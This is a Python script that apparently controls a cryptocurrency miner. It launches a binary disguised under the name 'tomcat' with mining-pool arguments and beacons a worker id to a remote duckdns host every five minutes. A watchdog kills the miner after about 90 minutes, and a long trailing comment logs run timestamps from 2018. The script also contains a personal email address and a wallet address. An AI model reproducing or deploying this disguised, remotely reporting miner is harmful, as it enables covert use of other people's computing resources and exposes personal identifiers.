import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:41:07.895160
#2018-02-17 17:31:06.511902
#2018-02-17 19:18:07.729694
#2018-02-17 21:09:06.445726
#2018-02-17 22:53:06.636470
#2018-02-18 00:38:05.115758
#2018-02-18 02:28:04.066653
#2018-02-18 04:15:06.786153
#2018-02-18 06:06:07.476239
#2018-02-18 07:57:05.682500
#2018-02-18 09:45:07.524025
#2018-02-18 11:33:05.271003
#2018-02-18 13:18:07.330448
#2018-02-18 15:08:01.536300
#2018-02-18 16:56:01.817819
#2018-02-18 18:43:06.229280
#2018-02-18 20:29:06.977517
#2018-02-18 22:15:04.016423
#2018-02-19 00:04:05.009387
#2018-02-19 01:49:06.435690
#2018-02-19 03:37:01.823050
#2018-02-19 05:22:01.775127
#2018-02-19 07:08:04.127394
#2018-02-19 08:56:07.805228
#2018-02-19 10:46:07.165007
#2018-02-19 12:33:05.918178
#2018-02-19 14:19:04.205349
#2018-02-19 16:08:06.752735
#2018-02-19 17:57:01.976899
#2018-02-19 19:43:07.425744
#2018-02-19 21:32:08.764737
#2018-02-19 23:18:04.501820
#2018-02-20 01:04:04.210657
#2018-02-20 02:53:07.382337
#2018-02-20 04:41:06.473128
#2018-02-20 06:25:06.857560
#2018-02-20 08:10:07.731496
#2018-02-20 09:57:06.000990
#2018-02-20 11:41:07.619360
#2018-02-20 13:28:01.684860
#2018-02-20 15:12:09.766281
#2018-02-20 16:58:01.680679
#2018-02-20 18:46:04.702589
#2018-02-20 20:39:05.647845
#2018-02-20 22:23:06.964872
#2018-02-21 00:04:06.041252
#2018-02-21 01:48:08.012402
#2018-02-21 03:36:04.197096
#2018-02-21 05:25:07.469962
#2018-02-21 07:13:05.324452
#2018-02-21 08:59:07.353213
#2018-02-21 10:49:06.106630
#2018-02-21 12:36:07.262622
#2018-02-21 14:23:07.570548
#2018-02-21 16:10:09.674933
#2018-02-21 18:00:11.118469
#2018-02-21 19:47:07.987206
#2018-02-21 21:35:09.241612
#2018-02-21 23:23:03.531960
#2018-02-22 01:11:07.118394
#2018-02-22 02:59:08.549338
#2018-02-22 04:46:01.978727
#2018-02-22 06:29:06.969887
#2018-02-22 08:16:05.180828
#2018-02-22 10:05:06.627976
#2018-02-22 11:49:09.067339
#2018-02-22 13:34:02.204941
#2018-02-22 15:24:06.179502
#2018-02-22 17:09:10.041015
#2018-02-22 18:56:01.962317
#2018-02-22 20:49:06.237050
#2018-02-22 22:36:04.039322
#2018-02-23 00:23:07.526694
#2018-02-23 02:11:04.753273
#2018-02-23 04:01:06.425562
#2018-02-23 05:48:07.575029
#2018-02-23 07:39:01.459613
#2018-02-23 09:42:02.177055
#2018-02-23 11:46:10.118226
#2018-02-23 13:36:07.625929
#2018-02-23 15:23:05.063615
#2018-02-23 17:10:01.322490
#2018-02-23 18:55:09.903994
#2018-02-23 20:41:08.265574
#2018-02-23 22:27:01.457243
#2018-02-24 00:12:06.153934
#2018-02-24 02:05:09.366338
#2018-02-24 03:38:04.008681
#2018-02-24 05:10:05.878845
#2018-02-24 06:46:05.670976
#2018-02-24 08:20:06.043286
#2018-02-24 09:48:03.622293
#2018-02-24 11:32:07.432826
#2018-02-24 12:59:04.972906
#2018-02-24 14:33:04.424357
#2018-02-24 16:03:04.299317
#2018-02-24 17:37:01.635372
#2018-02-24 19:12:05.373602
#2018-02-24 20:45:08.388495
#2018-02-24 22:31:01.334010
#2018-02-25 01:02:07.496795
#2018-02-25 02:58:04.591345
#2018-02-25 07:01:01.689436